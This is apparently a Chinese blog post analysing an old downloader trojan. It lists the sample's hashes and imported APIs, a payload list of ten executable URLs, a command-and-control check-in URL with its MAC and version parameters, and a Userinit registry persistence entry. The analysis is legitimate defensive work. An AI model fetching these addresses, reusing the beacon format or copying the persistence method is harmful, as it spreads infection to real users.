看到个帖子:
http://www.90sec.org/thread-2363-1-1.html
360报毒在本机缓存发现,求解密。。
网马样本为:2010年4月的极风0day网马,很老的网马了,分析如下:
小马地址:
http://58.221.45.182:8112/1.exe
Size: 6.44 KB (6,600 Bytes)
MD5: 4ae45ec367c6276780b94e4963c8fc7c
SHA1: 63d98487caed469ff9cbb8245b9c560f8fb8fafa
SHA256: b2f323cba81e4c7d76909693f3834f44cdb4a117321fedc9f6d94135e9a31280
加了压缩壳:
MD5: 4AE45EC367C6276780B94E4963C8FC7C
NSpack V3.7 -> LiuXingPing
脱壳后:
MD5: EC0B34FC81395DA811D2EE7209CE8F40
大小: 27.5 KB (28,219 字节)
Microsoft Visual C++ 6.0
调用敏感函数:
URLDownloadToFileA //下载文件并保存
WinExec //执行某个程序
DeleteFileA //删除指定文件
CopyFileA //复制文件
GetAdaptersInfo //获取网卡详细信息
一般是用来获取网卡MAC地址,控制系统用来统计唯一安装客户端数量用的。
下载列表地址:
http://ucc.iiuaa.com:1234/www1.txt
内容:
http://kk.utherar.com:7654/pd.exe
http://kk.utherar.com:7654/qsk.exe
http://kk.utherar.com:7654/chaj.exe
http://kk.utherar.com:7654/qse.exe
http://kk.utherar.com:7654/qso.exe
http://kk.utherar.com:7654/qsa.exe
http://kk.utherar.com:7654/qst.exe
http://kk.utherar.com:7654/qsq.exe
http://kk.utherar.com:7654/cpc.exe
http://kk.utherar.com:7654/gr.exe
上线地址:
http://118.129.161.180:900/getparams.ashx
会给上线系统提交以下内容:
%s?mac=%s&pnum=%d&ver=%s
说明:
http://118.129.161.180:900/getparams.ashx?mac=网卡MAC&pnum=整形数字(进程ID?)&ver=版本号
配置文件:
%c%c%c%c%c.ini
写注册表:
路径:LMSoftwareMicrosoftDownloadManager
路径:LMSoftwareMicrosoftWindows NTCurrentVersionWinlogon
子项:Userinit
类型:REG_SZ/REG_SZ
大小:68/200
值:C:WINDOWSsystem32userinit.exe,C:WINDOWSTasksconime.exe"
正常的值为:"C:Windowssystem32userinit.exe,"
作用:开机自启动,C:WINDOWSTasksconime.exe 为安装路径。
搞笑的是,还写了个:ASCII "nimamabidedongxi",“你妈妈逼的东西”。
╮(╯_╰)╭
API 操作:
C:TESTsample.exe 0x40178c CopyFileA(lpExistingFileName: "C:TESTsample.exe", lpNewFileName: "C:WINDOWSTasksconime.exe", bFailIfExists: 0x0)|0x1
总体评价:
垃圾下载者一个,所有下载执行操作几乎全部调用的普通 API,没有任何绕过主动防御的代码。
目测该下载者无法绕过任何主动防御,而且代码很简单,被杀很严重。
估计是直接网上找了个源码,改了改就用了,无语……
留言评论(旧系统):
文章来源于lcx.cc:简单分析一个网马
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论